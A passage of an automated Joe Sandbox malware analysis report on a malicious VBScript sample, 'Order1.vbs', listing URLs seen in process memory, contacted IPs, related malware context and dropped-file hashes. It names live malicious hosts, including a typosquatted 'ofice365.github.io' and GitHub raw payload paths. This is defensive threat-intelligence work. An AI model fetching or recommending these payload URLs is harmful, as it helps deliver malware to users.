                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1746460784.000001C1E0AE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1474264752.0000023096F61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://bitbucket.orgpowershell.exe, 00000004.00000002.1474264752.0000023097360000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1474264752.0000023097182000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/bd59e0614108/powershell.exe, 00000004.00000002.1474264752.0000023097360000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/bd59e0614108/img/logos/bipowershell.exe, 00000004.00000002.1474264752.0000023097360000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://id.atlassian.com/loginpowershell.exe, 00000004.00000002.1474264752.0000023097360000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.netpowershell.exe, 00000004.00000002.1474264752.0000023097360000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1474264752.0000023097343000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://stackoverflow.com/q/14436606/23354RegAsm.exe, 00000007.00000002.2586589024.0000000003023000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2600719194.0000000003F91000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2618327273.00000000057E0000.00000004.08000000.00040000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2600719194.0000000004035000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://ofice365.github.iopowershell.exe, 00000004.00000002.1474264752.0000023097360000.00000004.00000800.00020000.00000000.sdmptrue
                                                                        • Avira URL Cloud: malware
                                                                        		unknown
                                                                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.1474264752.0000023097182000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.1474264752.0000023097182000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://id.atlassian.com/logoutpowershell.exe, 00000004.00000002.1474264752.0000023097360000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://web-security-reports.services.atlassian.com/csp-report/bb-websitepowershell.exe, 00000004.00000002.1474264752.0000023097360000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1474264752.0000023097343000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://github.com/mgravell/protobuf-netRegAsm.exe, 00000007.00000002.2586589024.0000000003023000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2600719194.0000000003F91000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2618327273.00000000057E0000.00000004.08000000.00040000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2600719194.0000000004035000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/bd59e0614108/dist/webpackpowershell.exe, 00000004.00000002.1474264752.0000023097360000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://dz8aopenkvv6s.cloudfront.netpowershell.exe, 00000004.00000002.1474264752.0000023097343000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.1474264752.0000023097182000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://id.atlassian.com/manage-profile/powershell.exe, 00000004.00000002.1474264752.0000023097360000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/bd59e0614108/css/entry/adpowershell.exe, 00000004.00000002.1474264752.0000023097360000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.netpowershell.exe, 00000004.00000002.1474264752.0000023097360000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1474264752.0000023097343000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://stackoverflow.com/q/2152978/23354RegAsm.exe, 00000007.00000002.2600719194.0000000003F91000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2618327273.00000000057E0000.00000004.08000000.00040000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2600719194.0000000004035000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://cdn.cookielaw.org/powershell.exe, 00000004.00000002.1474264752.0000023097360000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1474264752.0000023097343000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://atlassianblog.wpengine.com/wp-json/wp/v2/posts?tags=11972&context=embed&per_page=6&orderby=dpowershell.exe, 00000004.00000002.1474264752.000002309735C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1474264752.0000023097360000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;powershell.exe, 00000004.00000002.1474264752.0000023097343000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://remote-app-switcher.stg-east.frontend.public.atl-paas.netpowershell.exe, 00000004.00000002.1474264752.0000023097360000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://aka.ms/pscore68powershell.exe, 00000002.00000002.1746460784.000001C1E0A9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1746460784.000001C1E0ABA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1474264752.0000023096F61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/bd59e0614108/css/entry/appowershell.exe, 00000004.00000002.1474264752.0000023097360000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/bd59e0614108/css/entry/vepowershell.exe, 00000004.00000002.1474264752.0000023097360000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://id.atlassian.com/login?prompt=login&amp;continue=https%3A%2F%2Fbitbucket.org%2Fccccccccccccnpowershell.exe, 00000004.00000002.1474264752.0000023097360000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high

                                                                                                                World Map of Contacted IPs

                                                                                                                • No. of IPs < 25%
                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                • 75% < No. of IPs

                                                                                                                Public IPs

                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                172.81.130.34
                                                                                                                		unknownUnited States
                                                                                                                		27176DATAWAGONUStrue
                                                                                                                185.166.143.50
                                                                                                                		bitbucket.orgGermany
                                                                                                                		16509AMAZON-02USfalse
                                                                                                                185.199.110.133
                                                                                                                		raw.githubusercontent.comNetherlands
                                                                                                                		54113FASTLYUSfalse
                                                                                                                185.199.110.153
                                                                                                                		ofice365.github.ioNetherlands
                                                                                                                		54113FASTLYUStrue

                                                                                                                General Information

                                                                                                                Joe Sandbox version:42.0.0 Malachite
                                                                                                                Analysis ID:1612365
                                                                                                                Start date and time:2025-02-11 19:02:24 +01:00
                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                Overall analysis duration:0h 6m 49s
                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                Report type:full
                                                                                                                Cookbook file name:default.jbs
                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                Number of analysed new started processes analysed:11
                                                                                                                Number of new started drivers analysed:0
                                                                                                                Number of existing processes analysed:0
                                                                                                                Number of existing drivers analysed:0
                                                                                                                Number of injected processes analysed:0
                                                                                                                Technologies:
                                                                                                                • HCA enabled
                                                                                                                • EGA enabled
                                                                                                                • AMSI enabled
                                                                                                                Analysis Mode:default
                                                                                                                Analysis stop reason:Timeout
                                                                                                                Sample name:Order1.vbs
                                                                                                                Detection:MAL
                                                                                                                Classification:mal100.spre.expl.evad.winVBS@8/7@4/4
                                                                                                                EGA Information:
                                                                                                                • Successful, ratio: 50%
                                                                                                                HCA Information:
                                                                                                                • Successful, ratio: 86%
                                                                                                                • Number of executed functions: 175
                                                                                                                • Number of non-executed functions: 7
                                                                                                                Cookbook Comments:
                                                                                                                • Found application associated with file extension: .vbs

                                                                                                                Warnings

                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                • Excluded IPs from analysis (whitelisted): 13.107.246.45, 172.202.163.200, 52.149.20.212
                                                                                                                • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                • Execution Graph export aborted for target powershell.exe, PID 7704 because it is empty
                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                Simulations

                                                                                                                Behavior and APIs

                                                                                                                TimeTypeDescription
                                                                                                                13:03:24API Interceptor43x Sleep call for process: powershell.exe modified
                                                                                                                14:37:00API Interceptor1942888x Sleep call for process: RegAsm.exe modified

                                                                                                                Joe Sandbox View / Context

                                                                                                                IPs

                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                172.81.130.34Payment slip.vbsGet hashmaliciousDiscord Token StealerBrowse
                                                                                                                  185.166.143.50phish_alert_iocp_v1.4.48 - 2025-01-16T090409.755.emlGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                    https://fub.direct/1/wpcpz2KV6CJLjr9Ku5V9crqS4vRSbleRYVQVlbRDO0VhTlcqWS8eK4Wwgpxp66dumoglzvq_ywSiT_-hMwRGjBfgg1rcvHOcCbgDl1KQiWE/https/bioaguabrasil.com.br/c63a6/yqfroqxuuz8idjj1hn2brw3g7czoqi/marian@ferax.com.plGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                      https://nuance-pdf-professional2.software.informer.com/7.2/Get hashmaliciousUnknownBrowse
                                                                                                                        invoice-1623385214.pdf.jsGet hashmaliciousPureLog Stealer, RHADAMANTHYS, zgRATBrowse
                                                                                                                          invoice-1623385214 pdf.jsGet hashmaliciousPureLog Stealer, RHADAMANTHYS, zgRATBrowse
                                                                                                                            0a0#U00a0.jsGet hashmaliciousPureLog Stealer, RHADAMANTHYS, zgRATBrowse
                                                                                                                              malware.batGet hashmaliciousPureLog Stealer, RHADAMANTHYSBrowse
                                                                                                                                1111.htaGet hashmaliciousUnknownBrowse
                                                                                                                                  j6ks0Fxu6t.exeGet hashmaliciousLummaCBrowse
                                                                                                                                    cMTqzvmx9u.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLineBrowse
                                                                                                                                      185.199.110.133sys_upd.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                      • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                                      cr_asm_menu..ps1Get hashmaliciousUnknownBrowse
                                                                                                                                      • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                                      cr_asm_phshop..ps1Get hashmaliciousUnknownBrowse
                                                                                                                                      • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                                      cr_asm_atCAD.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                      • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                                      vF20HtY4a4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                                      xK44OOt7vD.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                                      Lm9IJ4r9oO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                                      cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                      • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                                      SecuriteInfo.com.Trojan.GenericKD.74126573.27896.28845.dllGet hashmaliciousMetasploitBrowse
                                                                                                                                      • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_mnr.txt

                                                                                                                                      Domains

                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                      raw.githubusercontent.comSecuriteInfo.com.Win64.Evo-gen.20212.7823.exeGet hashmaliciousXmrigBrowse
                                                                                                                                      • 185.199.110.133
                                                                                                                                      SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeGet hashmaliciousQuasarBrowse
                                                                                                                                      • 185.199.110.133
                                                                                                                                      Mc3FDUMnVz.exeGet hashmaliciousAmadey, LummaC Stealer, PureLog StealerBrowse
                                                                                                                                      • 185.199.111.133
                                                                                                                                      rH3TpuMpZn.exeGet hashmaliciousScreenConnect Tool, Amadey, LummaC Stealer, PureLog Stealer, Quasar, RedLine, VidarBrowse
                                                                                                                                      • 185.199.111.133
                                                                                                                                      payment copy.vbsGet hashmaliciousDiscord Token StealerBrowse
                                                                                                                                      • 185.199.111.133
                                                                                                                                      l4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      • 185.199.108.133
                                                                                                                                      filw.exeGet hashmaliciousStealeriumBrowse
                                                                                                                                      • 185.199.108.133
                                                                                                                                      main.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      • 185.199.108.133
                                                                                                                                      europe.exeGet hashmaliciousLummaC, GO Backdoor, LummaC StealerBrowse
                                                                                                                                      • 185.199.108.133
                                                                                                                                      kjjA3Ebw2c.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      • 185.199.109.133
                                                                                                                                      bitbucket.orgSecuriteInfo.com.Win64.Malware-gen.25140.8272.exeGet hashmaliciousXenoRATBrowse
                                                                                                                                      • 185.166.143.49
                                                                                                                                      https://angelapledfgww.github.io/claragelz/claradetailsforijf.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                      • 185.166.143.49
                                                                                                                                      Payment slip.vbsGet hashmaliciousDiscord Token StealerBrowse
                                                                                                                                      • 185.166.143.48
                                                                                                                                      00wVZ1NU5b.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      • 185.166.143.49
                                                                                                                                      Set-UPl.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                      • 185.166.143.48
                                                                                                                                      good.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                      • 185.166.143.48
                                                                                                                                      phish_alert_iocp_v1.4.48 - 2025-01-17T094354.785.emlGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                      • 185.166.143.48
                                                                                                                                      phish_alert_iocp_v1.4.48 - 2025-01-16T090409.755.emlGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                      • 185.166.143.50
                                                                                                                                      https://fub.direct/1/wpcpz2KV6CJLjr9Ku5V9crqS4vRSbleRYVQVlbRDO0VhTlcqWS8eK4Wwxzhlqqgub8rchwk_ywSiT_-hMwRGjBfgg1rcvHOcCbgDl1KQiWE/https/bioaguabrasil.com.br/c63a5/0ibbcmvfccobt1ru40aael864dimea/ruixian.wang@huawei.comGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                      • 185.166.143.48
                                                                                                                                      https://fub.direct/1/wpcpz2KV6CJLjr9Ku5V9crqS4vRSbleRYVQVlbRDO0VhTlcqWS8eK4Wwgpxp66dumoglzvq_ywSiT_-hMwRGjBfgg1rcvHOcCbgDl1KQiWE/https/bioaguabrasil.com.br/c63a6/yqfroqxuuz8idjj1hn2brw3g7czoqi/marian@ferax.com.plGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                      • 185.166.143.50
                                                                                                                                      ofice365.github.ioSecuriteInfo.com.Win64.Malware-gen.25140.8272.exeGet hashmaliciousXenoRATBrowse
                                                                                                                                      • 185.199.108.153
                                                                                                                                      payment copy.vbsGet hashmaliciousDiscord Token StealerBrowse
                                                                                                                                      • 185.199.108.153
                                                                                                                                      dDFw6mJ.exeGet hashmaliciousVidarBrowse
                                                                                                                                      • 185.199.108.153

                                                                                                                                      ASNs

                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                      DATAWAGONUSOwari.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                      • 104.224.1.59
                                                                                                                                      Payment slip.vbsGet hashmaliciousDiscord Token StealerBrowse
                                                                                                                                      • 172.81.130.34
                                                                                                                                      PRODUCT LIST.exeGet hashmaliciousRedLineBrowse
                                                                                                                                      • 104.219.234.170
                                                                                                                                      Zoom.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      • 172.81.130.139
                                                                                                                                      Zoom.exeGet hashmaliciousPureCrypter, MicroClipBrowse
                                                                                                                                      • 172.81.130.139
                                                                                                                                      Payload 94.75 (3).225.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      • 172.81.131.156
                                                                                                                                      mpsl.elfGet hashmaliciousUnknownBrowse
                                                                                                                                      • 104.224.1.68
                                                                                                                                      b39wW3jYKO.exeGet hashmaliciousStormKitty, XWormBrowse
                                                                                                                                      • 104.219.239.11
                                                                                                                                      http://104.219.233.181/fwd/P2Q9MjU2Mjc5JmVpPTcyODUyMjcyJmlmPTUxNDQyJm5kcD03OTgzJnNpPTE3JmxpPTIyMzczGet hashmaliciousPhisherBrowse
                                                                                                                                      • 104.219.233.181
                                                                                                                                      https://burnlyinvestments.co.ke/images/Get hashmaliciousUnknownBrowse
                                                                                                                                      • 104.219.239.67
                                                                                                                                      AMAZON-02USDemande de devis. Quote Request.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • 13.248.169.48
                                                                                                                                      Payment -Advice-6UoSFOxOntvuu94-PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • 18.163.74.139
                                                                                                                                      IveteNWH1VBeB4z.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • 13.248.169.48
                                                                                                                                      PO.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • 13.248.169.48
                                                                                                                                      SOA - Final Payment.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • 13.248.169.48
                                                                                                                                      BINATONE LLC RFQ.Vbs.vbsGet hashmaliciousFormBookBrowse
                                                                                                                                      • 13.248.169.48
                                                                                                                                      http://d1xkzbyjtghizd.cloudfront.netGet hashmaliciousUnknownBrowse
                                                                                                                                      • 18.245.78.138
                                                                                                                                      REVISED PROFORMA INVOICE.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • 13.248.169.48
                                                                                                                                      JJ0tnjLiDS.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • 13.248.169.48
                                                                                                                                      https://tsa.formaloo.co/pv4hi3Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                      • 54.231.128.248
                                                                                                                                      FASTLYUShttps://tsa.formaloo.co/pv4hi3Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                      • 151.101.194.137
                                                                                                                                      https://3484378239874382399-f4g8bka8hcb2hwfu.z02.azurefd.net/9157562603/xCoLsHUiUn/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                      • 151.101.194.137
                                                                                                                                      https://handymanproservices.com/wp-includes/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                      • 151.101.194.137
                                                                                                                                      http://logi-vc.sp.backtrace.io:6097Get hashmaliciousUnknownBrowse
                                                                                                                                      • 151.101.1.194
                                                                                                                                      https://DBi.gnoqwwhpwe.ru/3aeK/#Qtest@test.comGet hashmaliciousUnknownBrowse
                                                                                                                                      • 151.101.2.137
                                                                                                                                      https://app.seesaw.me/pages/shared_item?item_id=item.6bc26822-ea06-488d-af24-af6dcd83acbe&share_token=NlfbZ6LrQHSy4jPYNGp-FQ&mode=shareGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                      • 151.101.2.217
                                                                                                                                      https://www.yougottabenotseriousbecause.com/wIcRm6CGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                      • 199.232.192.193
                                                                                                                                      Payment-Receipt_17578426321_on20230523.HTMLGet hashmaliciousUnknownBrowse
                                                                                                                                      • 151.101.194.137
                                                                                                                                      windows.ps1Get hashmaliciousXmrigBrowse
                                                                                                                                      • 185.199.109.133
                                                                                                                                      http://www.skywalkglobal.netGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                                                      • 151.101.0.239

                                                                                                                                      JA3 Fingerprints

                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                      3b5074b1b5d032e5620f69f9f700ff0eSkramlekassens.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                      • 185.166.143.50
                                                                                                                                      • 185.199.110.133
                                                                                                                                      • 185.199.110.153
                                                                                                                                      Quote RFQ #00926720250204.pdf(39kb).com.exeGet hashmaliciousQuasarBrowse
                                                                                                                                      • 185.166.143.50
                                                                                                                                      • 185.199.110.133
                                                                                                                                      • 185.199.110.153
                                                                                                                                      https://tsa.formaloo.co/pv4hi3Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                      • 185.166.143.50
                                                                                                                                      • 185.199.110.133
                                                                                                                                      • 185.199.110.153
                                                                                                                                      test.vbsGet hashmaliciousQuasarBrowse
                                                                                                                                      • 185.166.143.50
                                                                                                                                      • 185.199.110.133
                                                                                                                                      • 185.199.110.153
                                                                                                                                      poc.exe.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      • 185.166.143.50
                                                                                                                                      • 185.199.110.133
                                                                                                                                      • 185.199.110.153
                                                                                                                                      tOpxHK0Z2U.batGet hashmaliciousRemcosBrowse
                                                                                                                                      • 185.166.143.50
                                                                                                                                      • 185.199.110.133
                                                                                                                                      • 185.199.110.153
                                                                                                                                      5kldoushde.batGet hashmaliciousRemcosBrowse
                                                                                                                                      • 185.166.143.50
                                                                                                                                      • 185.199.110.133
                                                                                                                                      • 185.199.110.153
                                                                                                                                      puDUCOeVK6.batGet hashmaliciousRemcosBrowse
                                                                                                                                      • 185.166.143.50
                                                                                                                                      • 185.199.110.133
                                                                                                                                      • 185.199.110.153
                                                                                                                                      As7KZaO9Dy.batGet hashmaliciousRemcosBrowse
                                                                                                                                      • 185.166.143.50
                                                                                                                                      • 185.199.110.133
                                                                                                                                      • 185.199.110.153
                                                                                                                                      uowzo4rEa5.batGet hashmaliciousRemcosBrowse
                                                                                                                                      • 185.166.143.50
                                                                                                                                      • 185.199.110.133
                                                                                                                                      • 185.199.110.153

                                                                                                                                      Dropped Files

                                                                                                                                      No context

                                                                                                                                      Created / dropped Files

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):64
                                                                                                                                      Entropy (8bit):1.1940658735648508
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:Nlllulh49//lz:NllUu9//
                                                                                                                                      MD5:AADE84B9650AB09D8DC304B168D6D555
                                                                                                                                      SHA1:17BC4180A60DBFF0B3F9BF8E5C5987D452D1D868
                                                                                                                                      SHA-256:2C79C35AD1C4DFF21408F447C6AD565ACC3BDE8C8869108C8AA2F05B79539090
                                                                                                                                      SHA-512:594C57CC7D421DD576EA05344E4EA8179D93295003638AD34A634BB5632B88DF65B7AEB52515E50CA060DA57F7BC6553C0193FF1931CB95D9BDEC3845779045D
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                                      Preview:@...e................................................@..........

                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4njcxxwo.2nx.ps1

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):60
                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:high, very likely benign file
                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5d4mshtw.qnv.psm1

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):60
                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_csugchh5.pwo.ps1

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):60
                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qqik5jfg.zq5.psm1

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):60
                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                      Malicious:false
